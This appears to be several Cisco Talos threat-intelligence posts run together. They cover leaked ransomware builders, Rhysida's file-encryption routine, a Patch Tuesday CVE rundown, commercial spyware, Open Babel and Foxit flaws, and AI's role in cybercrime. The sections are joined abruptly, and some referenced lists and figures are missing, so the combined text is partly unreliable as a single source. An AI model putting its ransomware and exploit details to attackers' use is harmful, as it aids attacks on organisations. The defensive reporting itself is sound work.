Cybercriminals leveraging leaked code and builders are seemingly more conservative in their ransom demands, a possible indication that they are lone wolf operators, proceeding cautiously as they test their new variants or are new players in this space. Actors behind many of these new ransomware variants, including Sirattacker, Chaos 2.0, Chaos 4.0, DCrypt, and Shadow Men Team, are demanding payments ranging from USD $3.50 to $4,390 in Bitcoin from victims. These ransom demands are significantly lower than those made by many well-known ransomware gangs like RYUK, Babuk, REvil, Conti, DarkSide, BlackMatter, BlackCat, and Yanluowang, which are typically in the millions of dollars. These more profitable groups usually operate under the RaaS model, meaning their affiliates are free to set their own (often high) ransom demands, and/or are structured so they pay their operators and developers, thereby driving up the amount of money they seek to take in during the course of their operations.
Below is a comparison of ransom demands made by actors using leaked code or builders and well-known ransomware gangs.
Opportunities for security researchers and defenders
While these changes in the threat landscape have largely benefitted threat actors, security researchers and defenders also have an advantage with access to the leaked code. It allows security researchers to analyze the source code and understand the attacker’s tactics, techniques and procedures (TTPs), which helps security professionals develop effective detection rules and enhance security products' capabilities in combating ransomware threats.
By analyzing the source code, researchers can identify similar patterns and techniques used by different threat actors, providing defenders with a way to proactively detect and block the new variants at the initial stage of an attack. Security researchers can also share the intelligence information derived from the leaked code with the broader security community, thereby contributing to strengthening the cybersecurity space. By understanding the TTPs of the leaked source codes, defenders will gain invaluable insights that are helpful in identifying and mitigating any existing security weakness in their environment and improving their security defense against these attack vectors.
Microsoft disclosed 73 vulnerabilities across its suite of products and software Tuesday, including six that are considered “critical.”
One of the vulnerabilities, which Microsoft considers to be only of "moderate" severity, has been actively exploited in the wild. The company has had to address many zero-day vulnerabilities in its monthly security updates this year, including four last month and one in May. Microsoft also released an advisory detailing changes to its defense-in-depth model to defend against tactics adversaries are currently using in the wild.
Outside of the six critical issues, two are considered to be of “moderate” severity, while the remainder are listed as “important.”
Two of the critical vulnerabilities lie in Microsoft Teams, the company’s popular collaboration and messaging platform. An attacker could exploit CVE-2023-29328 and CVE-2023-29330 to perform remote code execution in the context of the victim user.
An attacker could exploit these vulnerabilities by tricking the victim into joining an adversary-created Teams meeting.
Three other critical remote code execution vulnerabilities — CVE-2023-35385, CVE-2023-36910 and CVE-2023-36911 — exist in Microsoft’s message queuing service for certain versions of Windows 10, 11 and Windows Server.
Message queuing would need to be manually enabled on a target’s machine for it to be exploitable, according to Microsoft. Users can check to see if they’re vulnerable by checking if there is a service named “Message Queuing” running on their device and if port 1801 is listening on the machine.
The last critical vulnerability included in August’s Patch Tuesday is CVE-2023-36895, a remote code execution vulnerability in Microsoft word. However, it has a relatively low severity score of 7.8 out of 10 for a critical vulnerability.
Microsoft Exchange also contains four remote code execution vulnerabilities, though all are considered “important.”
An authenticated attacker who is on the same intranet as the Exchange Server could achieve remote code execution via a PowerShell remoting session, according to Microsoft, by exploiting CVE-2023-35388, CVE-2023-35368, CVE-2023-38182 and CVE-2023-38185.
An adversary could only exploit the vulnerabilities in Exchange Server if they have valid credentials to log in with LAN access and have access to a valid Exchange user account.
Microsoft’s advisories state that these issues are “more likely” to be exploited, though the adversary must first have local access to the targeted machine, and the targeted user needs to be able to create folders and performance traces on the machine, which most users have by default.
Another privilege escalation vulnerability, CVE-2023-36900, exists in the Windows Common Log File System Driver. An attacker could also exploit this vulnerability to gain SYSTEM-level privileges, though they first must be able to log into the targeted system with the privileges of a standard user.
The only vulnerability Microsoft states is being exploited in the wild is CVE-2023-38180, a denial-of-service vulnerability in .NET and Microsoft Visual Studio. Though there are little details available currently about this issue, Microsoft states that the attack complexity is “low” and does not require any user privileges or interaction for an attacker to exploit it.
Talos would also like to highlight five “important” vulnerabilities that Microsoft considers “less likely” to be exploited. However, as these issues exist in the popular Microsoft Office suite of products and could lead to remote code execution, are still worth noting:
A complete list of all the vulnerabilities Microsoft disclosed this month is available on its update page.
In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Secure Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
The rules included in this release that protect against the exploitation of many of these vulnerabilities are 40689, 40690, 62202, 62203, 62208 - 62211, 62215 and 62216. There are also Snort 3 rules are 300648 - 300650 and 300652.
As we've discussed recently, there has been huge growth in the ransomware and extortion space, potentially linked to the plethora of leaked builders and source code related to various ransomware cartels. This is just another example of how these groups can now quickly develop their own ransomware variants by standing on the shoulders of those criminals who had their previous work exposed publicly. Rhysida appears to have first popped up back in May, with several high-profile compromises posted on their leak site.
Rhysida ransomware details
As we commonly see in the ransomware space, this threat is delivered through a variety of mechanisms which can include phishing and being dropped as secondary payloads from command and control (C2) frameworks like Cobalt Strike. These frameworks are commonly delivered as part of traditional commodity malware, so infection chains can vary widely.
The group itself likes to pretend to be a cybersecurity organization as shown in the ransom note below. They claim to have compromised the company and are willing to help resolve the issue. These types of approaches are not uncommon — historically, groups have done things like provide "security reports" to compromised organizations to help them "resolve the issue."
Sample ransom note.
The group appears to commonly deploy double extortion — of the victims that have been listed on the leak site, several of them have had some portion of their exfiltrated data exposed.
Encryption algorithm
Rhysida’s encryption algorithm is relatively straightforward and uses the ChaCha20 encryption algorithm. We have seen this algorithm deployed by other groups before, either as a standalone encryption algorithm or as part of a more custom approach. Rhysida will enumerate through directories and files in directories starting from “A:” to “Z:” drives, ensure they’re missing from the “exclude list” and then “process,” i.e., encrypt the files. Once encrypted, the file is then renamed to “<filename>.rhysida”.
Rhysida’s algorithm for “processing” files.
The file exclusion list maintained in Rhysida samples is most of the usual system directories required for the operating system to function:
After encryption, the ransomware will display the ransom note by creating and opening it as a PDF and the background wallpaper. The PDF usually named “CriticalBreachDetected.pdf” is generated using content embedded in the ransomware binary, including the skeleton PDF and the ransom note (shown above). The ransom note is also used to generate a message in the form of the background wallpaper typically located at “C:/Users/Public/bg.jpg”.
This new ransomware variant doesn't have any novel features or functionality and points to the challenges organizations are facing as the landscape continues to shift and a plethora of new actors join their ranks. This isn't even the only new ransomware group we've written about this week.
Coverage
Ways our customers can detect and block this threat are listed below.
Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.
Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.
Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
Cisco Talos is releasing the following Snort SIDs to protect against this threat: 62220 - 62229, 300653 - 300657.
We’ve talked quite a bit about spyware recently, with very good reason. Recently, concerns have grown regarding the rapid growth of commercial spyware tools, and the way in which they are being used against their intended victims.
This Need to Know article talk about the broader effects of spyware becoming more commercialized, how it is being used, and the differences between commercial spyware and digital extortion.
What is commercial spyware, and why is it a growing trend?
In general terms, spyware is software that can be installed on a device and used to monitor activity and/or capture potentially sensitive data. The term has been around since the 1990s, and the first spyware to be identified was developed by criminals to steal passwords or financial information from devices. Spyware can even be used to track the device's physical location and record from the camera or microphone.
The opportunities for governments and law enforcement to use spyware as part of legal investigations led to the development of commercial spyware. Attackers have long used commercial products developed by legitimate companies to compromise targeted devices.
These products are known as commercial spyware. Commercial spyware operations mainly target mobile platforms with zero- or one-click zero-day exploits to deliver spyware.
Commercial spyware can be seen as having legitimate reasons to exist, especially in instances of crime and terrorism (as long as it is highly regulated). The problem is that there isn’t a universal or global way in which these companies are being regulated.
As such, we’ve seen a growing number of reports of victims who are targeted with commercial spyware. These victims are not criminals or terrorists, but instead, they are associated with activism. For example, there have been reports of journalists who report on human rights abuses, and activists shining a light on oppressive regimes, who have been targeted and compromised with this tooling.
Problems also arise when organizations turn a blind eye to the usage of commercial spyware.
A recent report from the United Kingdom’s National CyberSecurity Center (NCSC) highlights how the accessibility of these tools “lowers the barrier to entry to state and non-state actors in obtaining capability and intelligence.” The United States government also threatened to step in when it looked like a U.S. company was going to purchase NSO Group, an infamous Israeli maker of the Pegasus spyware.
What ways can you protect yourself if you might be a target of commercial spyware?
As the victims of commercial spyware are highly targeted individuals, the sobering truth is that some attackers have the means to be able to spend six figures to compromise a single target. It is therefore likely that they will try many things to compromise your mobile phone, including using zero-day attacks or unknown vulnerabilities.
That is very concerning to us, however, there are a couple of things that end users can look out for:
Although zero-click exploits do exist, they're not very common. Most of the time, unsolicited messages from various people are the first entry point. So, if you get a bunch of messages from strangers, don't click on the links, and don’t click on any attachments.
Additionally, something as simple as rebooting your phone can help clear the spyware from your device. This is because commercial spyware companies typically do not build persistence into their spyware.
If you are talking to someone who may be a target of commercial spyware (i.e., human rights journalists, activists, dissidents and lawyers) it’s a good idea to reboot your phone before you talk to them. It is entirely possible that these threat actors will go as far as compromising close contacts of their targets.
PREDATOR is intended to work with another spyware component called “ALIEN” (it’s not “Alien vs. Predator” this time; they’re working together). They work to bypass traditional security barriers on the Android operating system and provide a variety of information stealing, surveillance and remote access capabilities.
The differences between commercial spyware and digital extortion attacks
You may have received an email something like, “We know you’ve visited this adult website. We filmed you watching some videos. Now we’re going to send all your friends and family that footage unless you pay us in bitcoins.”
These are typically digital extortion attacks, not actual spyware. Attackers send these emails to multiple accounts, hoping that someone will believe the story, and pay up.
As we’ve talked about, commercial spyware is highly targeted. The customers of these commercial spyware organizations know who their victim(s) are. In digital extortion attacks, cyber criminals generally don’t know who their victims are, but they’re hoping as many people as possible believe the story, and pay up.
They will usually have found your email address via a data breach of a third party. If you receive such an email, just delete it and don’t give it a second thought. The email you received will be one of many thousands.
What is Cisco doing to take action against the growth of commercial spyware?
Cisco, Microsoft, and other tech companies have joined in supporting Meta's lawsuit against the NSO Group referenced above through court filings. Cisco was also a key drafter of the Cyber Mercenary Principles document adopted by the Cyber Tech Accord. The document acknowledges the threat realized by these commercial offerings and outlines the steps that organizations are taking to help limit the impacts of commercial spyware.
Learn more
Researchers at Cisco Talos recently wrote an ‘On the Radar’ article about the growth of spyware-based intelligence providers, without legal or ethical supervision. The article also looks to the untethered future of commercial spyware and contains advice about what to do if you feel you have been targeted with spyware - especially if you have a higher risk profile (i.e., journalists and dissidents).
Also check out this episode of the Talos Takes podcast, where Asheer Malhotra talks to Jon Munshaw about the dangers of spyware and mercenary groups.
Cisco Talos recently worked with two vendors to patch multiple vulnerabilities in a favored software library used in chemistry laboratories and the Foxit PDF Reader, one of the most popular PDF reader alternatives to Adobe Acrobat.
Attackers could exploit these vulnerabilities to carry out a variety of attacks, in some cases gaining the ability to execute remote code on the targeted machine.
Seven of the vulnerabilities included in today’s Vulnerability Roundup have a CVSS severity score of 9.8 out of a possible 10.
For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.
Multiple vulnerabilities in Open Babel software
Talos researchers recently discovered multiple vulnerabilities in Open Babel, an open-source software library used in a variety of chemistry and research settings.
Open Babel allows users to “search, convert, analyze, or store data from molecular modeling, chemistry, solid-state materials, biochemistry, or related areas,” according to its website, and is used in other popular pieces of software in the science field. Therefore, there are cases where these vulnerabilities are accessible via the internet.
The vulnerabilities Talos disclosed to the operators of Open Babel can all be triggered by tricking a user into opening a specially crafted, malformed file. Depending on the platform and on how the code is compiled, these vulnerabilities could lead to arbitrary code execution:
Talos is disclosing these vulnerabilities despite no official fix from Open Babel. The vendor declined to release an update within the 90-day period as outlined in Cisco’s vulnerability disclosure policy.
Several issues in Foxit PDF reader could lead to arbitrary code execution
Foxit PDF Reader is one of the most popular PDF readers on the market, offering many similar features to Adobe Acrobat. The software also includes a browser extension that allows users to read PDFs right in their web browsers.
Talos discovered multiple vulnerabilities in Foxit PDF Reader that could allow an adversary to execute , arbitrary code on the targeted machine. An attacker could exploit these issues by tricking a user into opening a specially crafted PDF document or, if the user has the browser extension enabled, by visiting a malicious web page:
It’s been a whirlwind, personally and professionally, and I think it’s important for the security community to take a step back occasionally, to look back on what’s already happened in a year and what that tells us about the coming months.
For me, in reading the Year in Review so far and reflecting on it on the podcast, I had completely forgotten about supply chain attacks. I personally think the MOVEit file transfer breach, and follow-on breaches and compromises, has been placed on the back burner because it’s almost too big for us to even conceive of. At this point, nearly every Fortune 500 company has been affected by this in some way.
The dangers of the MOVEit breach continue to grow, with Clop now using torrents to leak targets’ information, potentially making the leaks more dangerous and faster for bad actors to download.
The list of affected organizations grows every day, with the Clop ransomware group adding more names to its leak site, and public companies having to make disclosures about potential data leaks or theft. Yet the news around this seems to have been relegated to regular news posts about, “Company X just got added to the Clop leak site” rather than reflecting on the dangers of supply chain attacks.
I’ve written before about how we aren’t talking about supply chain attacks enough already, and this year alone we’ve seen MOVEit (which, in my opinion, kind of straddles the line as a “traditional” supply chain attack because it’s more of a data breach with more follow-on data breaches), 3CX, and another attack against CircleCI, a continuous integration platform vendor.
3CX was a big deal in the moment, but looking at the Half-Year in Review, I feel like we moved past it so quickly. Instead, headlines are still dominated by ransomware attacks and big-game hunting, which are certainly no less important on the security landscape — but it is so easy to get swept up in the day’s goings-on by looking for the latest, fastest updates on security social media.
With BlackHat and “Hacker Summer Camp” going on over the next few weeks, this seems like the right time to step back and reflect on what’s happened so far this year. This could include just taking time to look back on personal successes, team wins, or just one or two things that happened in February that you may have already forgotten about.
The one big thing
Our researchers recently discovered an unknown threat actor, seemingly of Vietnamese origin, conducting a ransomware operation that’s been going on since at least June 4. This ongoing attack uses a variant of the Yashma ransomware likely to target multiple geographic areas by mimicking WannaCry characteristics. The threat actor uses an uncommon technique to deliver the ransom note. Instead of embedding the ransom note strings in the binary, they download the ransom note from the actor-controlled GitHub repository by executing an embedded batch file.
Why do I care?
This new actor appears to target users and companies all over the world, including a variety of English-speaking nations, Bulgaria, China and Vietnam. Victims hit with this malware are asked to pay a requested ransom in the form of Bitcoin, an amount that doubles if it’s not made within three days post-infection. This Yashma variant also appears to be harder to recover from than the average ransomware — after encrypting files, the ransomware wipes the contents of the original, unencrypted file and then replaces the file name with a “?”.
So now what?
Cisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. For specific OSqueries on this threat, click here. There are also numerous protections in place to detect and defend against this malware, as outlined in our blog post.
Top security headlines of the week
Dozens of hospitals and healthcare facilities across the U.S. are still recovering after a large healthcare system was forced to take its computer systems offline as the result of a ransomware attack. Prospect Medical Holdings, a chain that operates hospitals and outpatient facilities, in California, Connecticut, Pennsylvania and Rhode Island, first disclosed the incident last week, announcing it was having to shut down some emergency rooms and reroute ambulances to other facilities. The FBI announced it was launching an investigation into the cause, and actors behind, the attack. Some outpatient facilities, like radiology and heart health clinics, had to close altogether temporarily because they could not function without the use of the company’s computer systems. (CBS News, NBC News)
Cult of the Dead Cow, an infamous hacking group once known for shaming companies into improving their security, is planning to launch a new app framework that puts privacy first. The system will allow individuals and companies to create social media and messaging apps that do not hold onto users’ personal data. Traditional social media companies make a large chunk of their profits off selling that information to advertisers and other companies looking to reach certain demographics. Representatives from the hacking collective are expected to discuss the framework more at the upcoming DEF CON conference. Creators say the framework uses the in-house “Veilid” protocol for end-to-end encryption that could make it difficult for even governments to view information on the apps without proper authorization. However, they still face the challenge of convincing developers and companies to design apps that are compatible with Veilid. (Washington Post, DarkReading)
The U.K.’s Electoral Commission revealed this week it was the target of a “complex cyber attack” that potentially exposed the personal details of millions of British voters. The Commission said adversaries stole copies of the electoral registers from August 2021, but the breach was not discovered until October 2022. However, they’ve yet to “conclusively” determine what files, exactly, were accessed. An early report on the attack from the Electoral Commission found that the personal data found on the registers did not present a “high risk” to the individuals listed on it. However, that information could be paired with other public information or stolen data from other attacks to “identify and profile individuals.” The adversaries were removed from the network as soon as the breach was discovered in October. (Infosecurity Magazine, BBC)
Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation.
Nicole Hoffman and James Nutland discuss the MIRE ATT&CK framework in “One Leg to Stand on: Adventures in Adversary Tracking with ATT&CK.” Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often, techniques are thrown at the bottoms of reports and blogs without any context never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking.
Most prevalent malware files from Talos telemetry over the past week
AI’s influence is growing across the security space, bringing with it major implications for cybercriminals and defenders.
The recent adoption of AI has raised significant concerns for cybersecurity due to the many ways that criminals can use AI for disruption and profit.
Defenders and law enforcement can use AI to strengthen cybersecurity and counteract illicit activities.
The past decade has seen a massive adoption in machine learning and artificial intelligence. An increasing number of organizations have been leveraging such technologies to automate their operations and make their products and services better.
Despite the extensive use of machine learning (ML) and artificial intelligence (AI) by organizations for some time now, many users have first interacted with such technologies over the past few months in the form of generative AI helping users to generate text, code, images and other digital assets with the provision of limited input. The likes of ChatGPT have brought AI to the top of the public’s mind, fueling an intensive race for AI development.
As with any innovation, the use of AI is expected to have positive and negative effects on global culture as we know it, but I suspect that cybercrime will be one of the areas most affected. On the negative side, AI can help streamline criminals' operations, making them more efficient, sophisticated, and scalable while allowing them to evade detection and attribution. Concerning the positive impact of AI on cybersecurity, defenders, and law enforcement, can use AI to counteract advancements in illicit activity by developing new tools, tactics and strategies to automate data analysis, perform predictive detection of illicit activity and perform more effective attribution of criminal activity.
It is important to acknowledge that the AI use cases discussed in this blog encompass a range of varying complexities to achieve for both criminals and defenders. Certain use cases can be accomplished using readily available AI-enabled tools, while others demand advanced technical skills, costly infrastructure, and considerable time investments.
Empowering cybercrime
Cybercriminals are expected to benefit in many ways from advancements in machine learning and artificial intelligence.
A major area of impact of AI tools in cybercrime is the reduced need for human involvement in certain aspects of cybercriminal organizations, such as software development, scamming, extortions, etc., which in turn will decrease the need to recruit new members and lower operational costs due to the reduced need for headcount. While crime-related "job" postings typically find their way onto dark web forums and other anonymous channels, striving to ensure author anonymity, this practice carries significant risks as it could potentially unveil the identities and operations of criminals to whistleblowers and undercover law enforcement agents.
AI presents another avenue for cybercriminals to exploit by utilizing it to analyze enormous amounts of information, including leaked data. This analysis empowers them to identify vulnerabilities or high-value targets, enabling more precise and effective attacks that could potentially yield greater financial gains. Big data analytics is a complex undertaking necessitating significant processing power and thereby limiting its application to potentially large criminal organizations and state-sponsored actors capable of harvesting such power.
Another area of criminal activity that can thrive with AI is the development of more sophisticated phishing and social engineering attacks. This includes the creation of remarkably realistic deepfakes, deceitful websites, disinformation campaigns, fraudulent social media profiles and AI-powered scam bots. To illustrate the impact, consider an incident from 2020 wherein an AI-powered voice cloning attack successfully impersonated a CEO, resulting in the theft of more than $240,000 from a UK-based energy company. Similarly, in India criminals employed a machine learning model to analyze and mimic the writing style of a victim's email contacts to create highly personalized and persuasive phishing emails.
The utilization of AI is anticipated to also be prevalent among state-sponsored actors and prominent criminal organizations, to propagate disinformation and manipulate the public. Such tactics involve the creation and dissemination of deceptive content, including deep fakes, voice cloning, and the deployment of bots. Evidence of such practices already exists by a cybercriminal group employing AI for social media manipulation and spreading disinformation about the COVID-19 pandemic. This campaign relied on machine learning to identify emerging trends and generate highly convincing fake news articles.
The advancement of malware can also be impacted by allowing authors to streamline the process with the help of AI, enabling the creation of sophisticated and more adaptable malware. Allowing AI-powered malware to employ advanced techniques to evade detection by security solutions, utilizing "self-metamorphic" mechanisms rendering them capable of changing their operations based on the environment they operate in. Furthermore, criminals can potentially harness AI technology in the development of AI-powered malware development kits. These kits employ AI agents that learn from the latest tools, tactics, and procedures (TTPs) employed by malware authors, as well as stay updated with the latest advancements in security. An example of AI-powered malware is demonstrated by the researchers behind DeepLocker. Showcased how AI can be used to enhance targeted attacks, ensuring exploitation only when the intended target is present and to evade detection by concealing itself within benign applications.
Counteracting cybercrime
On the other side, cybersecurity professionals, defenders, and law enforcement agencies can harness the power of AI to counteract the advancements made in cybercrime. They can utilize AI to develop innovative tools, tactics, and strategies in their fight against malicious activities.
Areas such as threat detection and prevention will be at the forefront of AI security research. Many existing security tools, heavily rely solely on malicious signatures and user input, which render them ineffective for detecting advanced attacks. Consequently, an increasing number of vendors are turning to machine learning (ML) and AI technologies to achieve more precise and effective threat detection. Prominent examples include Cisco Secure Endpoint and Cisco Umbrella utilizing advanced machine learning to detect and mitigate suspicious behavior in an automated manner on end hosts and networks respectively. The inclusion of these technologies is likely to counter the malware being generated by AI discussed above.
Analysis of large amounts of data for the identification of indicators of compromise can be a tedious undertaking, consuming considerable time and money. As such, one area that can benefit from AI is Incident response and forensics for the automated analysis of large volumes of logs, system images, network traffic and user behavior for the identification of indicators of compromise (IOCs) and adversarial activity. AI can help speed up the investigation process, identify patterns that may be difficult to detect manually, and provide insights into the techniques and tools used by adversaries. Allowing more companies globally to have incident response and forensic capabilities.
Another potential use for AI by defenders and law enforcement alike is to enhance the attribution of criminal activity to adversaries through the analysis of multiple data points, including attack signatures, malware characteristics, and historical attack patterns, tools, tactics, and procedures. By examining these data sets, AI can identify patterns and trends that aid cybersecurity experts in narrowing down the potential origin of an attack. This attribution is valuable as it provides insights into the motives and capabilities of the attackers, allowing for a better understanding of their tactics and potential future threats. In addition, it allows defenders to more accurately identify adversaries that are leveraging tactics to evade identification by misleading attribution (e.g., use techniques, methodologies and tools another hacking group is using), which is an existing occurrence that defenders must consider when performing attribution. Such capabilities are primarily expected to be witnessed in the arsenal of state-affiliated cyber agencies as well as on a corporate level from threat intelligence providers.
ML algorithms and AI are set to expand their utilization for automated analysis and the identification of threats. Through the automated analysis of security-related data from multiple sources like threat intelligence feeds, dark web monitoring, and open-source intelligence, emerging threats can be identified and mitigated effectively. Cisco Talos has been leveraging AI for several years to automate threat intelligence operations such as the classification of similarly rendered web pages, identify spoofing attempts through logo analysis, phishing email classification based on text analytics and binary similarities analysis. Although existing work around emerging threats has proven to be highly effective, AI will further the area by allowing for more automate data collection, analysis, and correlation on a larger scale, facilitating the identification of patterns and trends that may signify new attack techniques or threat actors. This empowers cybersecurity professionals to proactively respond to emerging cyber threats by leveraging AI's ability to process and interpret vast amounts of data swiftly and accurately.
AI can also serve as a valuable tool for predictive analytics, enabling the anticipation of potential cyber threats and vulnerabilities based on historical data and patterns. By analyzing data from past attacks and adversaries, AI systems can identify common trends, patterns, or groups that may indicate or trigger future attacks. This capability empowers cybersecurity experts to take a more proactive stance to security, such as promptly patching vulnerabilities or implementing supplementary security controls, to mitigate potential risks before they are exploited by adversaries. Additionally, AI-driven predictive analytics allows for closer monitoring of adversaries' activities, enabling experts to anticipate and prepare for new attacks. By leveraging AI in this manner, cybersecurity professionals can enhance their defenses and stay one step ahead of evolving threats. A sizable number of cybercrime predictive research exists, highlighting how to practically use AI to support cybercrime research, as well as how to perform predictive analysis based on social and economic factors using the Bayesian and Markov Theories.
The rise of AI presents new challenges and great opportunities as its user base and applications continue to expand. The effective and targeted utilization of AI-related technologies will play a pivotal role for cybersecurity experts and law enforcement agencies in detecting, defending against, and attributing digital criminal behavior. By harnessing the power of AI, these entities can enhance their capabilities in combating evolving threats and ensuring the security of digital ecosystems. As the landscape of cybercrime evolves, embracing AI will be instrumental in staying ahead of adversaries.
Welcome to this week’s edition of the Threat Source newsletter.
I had a significant amount of FOMO last week seeing everyone out in Vegas. (I was happy to not get conference crud sickness, but it seems like I missed a great time otherwise.)
But, as anyone who works with me could guess, I was following closely online through social media and news reporting. If you’re in the same boat as me and couldn’t attend BlackHat or DEF CON in person, I wanted to use this space to recap what I felt were the top stories and headlines coming out of the various new research that was published, talks, interviews and more.
There were many other panels and talks around AI, along with questions about whether the technology has plateaued after so many companies developed their own ChatGPT-like.
I was also fascinated by several interviews and talks from an FBI official about distributed denial-of-service attacks. I’ve written before about how there’s a renewed interest in DDoS attacks recently, especially those targeting high-profile companies and games.
Two high-ranking government officials gave a joint talk at Black Hat where they said the majority of DDoS attacks are the result of a dispute over business transactions or good ‘ol fashioned video game beef.
The same presenters gave additional details on how the FBI prioritizes stopping DDoS attacks. Chances are, if you’re a bad actor who makes the news for DDoS attacks, the federal government is not far behind.
I also always love the crazy vulnerabilities or hacking methods that come out of both these conferences. A highlight for me was a group of researchers who found a way to hijack one of the most popular automatic card shufflers (fitting for Vegas) to the point that someone could know the order of cards ahead of time in a gambling game.
I’m not quite sure what the actual attack surface is here because the potential hacker would need to install a tiny physical USB device into the shuffler, and I don’t think any casino worker would be thrilled to see you crawling around on the floor, but I do always love to see the downside of putting a USB port on everything.
And there was the brief, but confusing, saga at DEFCON about the pop-up notifications iPhone users were getting asking people to pair with a rogue Apple TV. Turns out it was a harmless prank from one of the attendees, who just wanted to drive home the point that it’s important to really turn off Bluetooth all the way, and not just click the little button in the Control Center.
Lastly, we wanted to thank Viktor Zhora, the deputy chairman and chief digital transformation officer at the State Service of Special Communication and Information Protection for Ukraine, for taking the time to say “Hi” to us on the show floor. He specifically took time out of his day to make sure he could meet Matt Olney, who’s been one of our leaders in helping support Ukraine. Viktor was a speaker at BlackHat and had a very busy schedule of media appearances, so we were flattered that he made sure to see Matt.
The one big thing
Since AI was already the talk of the town at Black Hat and DEF CON, we wanted to continue the conversation around tehse tools and the implications on cybersecurity. As one of our incident responders wrote in the latest in our “On the Radar” series, AI’s influence is growing across the security space, bringing with it major implications for cybercriminals and defenders. The recent adoption of AI has raised significant concerns for cybersecurity due to the many ways that criminals can use AI for disruption and profit.
Why do I care?
AI can help streamline criminals' operations, making them more efficient, sophisticated, and scalable while allowing them to evade detection and attribution. AI presents another avenue for cybercriminals to exploit by utilizing it to analyze enormous amounts of information, including leaked data. This analysis empowers them to identify vulnerabilities or high-value targets, enabling more precise and effective attacks that could potentially yield greater financial gains. For defenders, though, AI also opens the door to new defensive tactics and tools, so it’s important to see the positives and negatives of AI in security.
So now what?
There is no real action for the average user to take at this point, but I feel this piece is a good opportunity for everyone to take a step back about what we currently know, and don’t know, about AI and its intersection with security.
Top security headlines of the week
Two police precincts in the U.K. had mistakenly been leaking the personal information of individuals connected to crimes for years. The UK's Norfolk and Suffolk police constabularies disclosed that, between April 2021 and March 2022, the information was accidentally attached to crime statistics distributed as part of Freedom of Information Act (FOIA) requests. The data includes personally identifiable information related to witnesses, suspects and victims of a variety of crimes, including domestic violence, assaults, thefts and hate crimes. The forces say they are now contacting more than 1,200 people who may have been affected. Representatives from the two departments said in a statement that, “Strenuous efforts have been made to determine if the data released has been accessed by anyone outside of policing. At this stage we have found nothing to suggest that this is the case.” (CSO Online, Politico)
Viktor Zhora, one of Ukraine’s top cybersecurity officials, said at Black Hat that his country is taking several steps to document what may constitute war crimes committed by Russian state-sponsored actors. Zhora said that attacks affecting critical infrastructure and communications for civilians could fall under such umbrellas and his team is actively collecting evidence as the kinetic military conflict continues. Speaking alongside Zhora, Jen Easterly, the U.S.’ top cybersecurity official, said the U.S. has learned several lessons from Russia’s invasion of Ukraine, including the importance of assistance from private cybersecurity companies. (CyberScoop, The Record)
Several years’ worth of Intel chips contains a newly discovered flaw known as “Downfall,” which is like the Meltdown and Spectre bugs from several years ago. Identified as CVE-2022-40982, the issue could allow the CPU to “unintentionally reveal internal hardware registers to software,” according to a write-up from Google’s security research team. Proof of concept code shows that an attacker could use Downfall to steal encryption keys from other users on a given server and other sensitive data. Downfall affects most CPUs in Intel's 6th through 11th-generation Core lineups for consumer PCs. Most of the affected devices were sold starting in 2015 and may still be available in systems today. Intel’s patch for the issue negatively affects the performance of the CPUs, with some studies finding that performance could dip to 40 percent. (Ars Technica, PC World)
Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation.
Nicole Hoffman and James Nutland discuss the MIRE ATT&CK framework in “One Leg to Stand on: Adventures in Adversary Tracking with ATT&CK.” Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often, techniques are thrown at the bottoms of reports and blogs without any context never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking.
Most prevalent malware files from Talos telemetry over the past week
Adversaries are increasingly writing malware in programming languages such as Go, Rust, or Nim, because they present challenges to investigators using reverse-engineering tools designed to work best against the C family of languages.
It’s often difficult for reverse engineers examining non-C languages to differentiate between the malware author’s code and the language’s standard library code. In the vast majority of cases, Hex-Ray’s Interactive Disassembler (IDA) has the out-of-the-box capability to identify library functions or generate custom Fast Library Identification and Recognition Technology (FLIRT) signatures and solve the issue.
But for Nim, generating signatures is distinctly more difficult. Cisco Talos is excited to announce a new project to find an automated way to generate custom FLIRT signatures for IDA, which led to a talk at Recon.cx 2023 and a guest blog on Hex-Rays. This blog describes the technical details of our research.
Piotr Bania of Cisco Talos discovered the vulnerabilities mentioned in this post.
